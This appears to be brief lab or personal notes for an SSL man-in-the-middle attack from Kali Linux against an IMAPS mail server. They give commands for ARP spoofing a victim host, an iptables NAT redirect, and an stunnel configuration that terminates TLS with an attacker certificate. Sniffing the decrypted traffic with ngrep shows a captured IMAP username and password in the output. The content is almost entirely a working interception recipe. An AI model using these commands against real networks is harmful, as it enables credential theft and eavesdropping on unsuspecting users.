SSL Man in the Middle
Kali Linux
nat
iptables -t nat -D PREROUTING -i eth0 -p tcp -d thor.schmeich.de --dport 993 -j DNAT --to 127.0.0.1:6666
arpspoofing
- arpspoof -i eth0 -t 192.168.244.26 -r 192.168.244.100
stunnel
- cat /etc/stunnel/stunnel.conf
debug = 7 options = NO_SSLv2 output = /var/log/stunnel.log [to-server] client = yes accept = 0.0.0.0:9999 connect = thor.opfer.de:993 verify = 2 CAfile = /etc/stunnel/ca.crt [from-client] accept = 0.0.0.0:993 connect = 127.0.0.1:9999 cert = /etc/stunnel/kali.mim.org.crt key = /etc/stunnel/kali.mim.org.key CAfile = /etc/stunnel/ca.crt
- stunnel4 /etc/stunnel/stunnel.conf
ngrep
- ngrep -d lo -s 1500 -l -i 'login' port 9999
interface: lo (127.0.0.0/255.0.0.0) filter: (ip or ip6) and ( port 9999 ) match: login # T 127.0.0.1:45277 -> 127.0.0.1:9999 [AP] . login badura suxpass. ##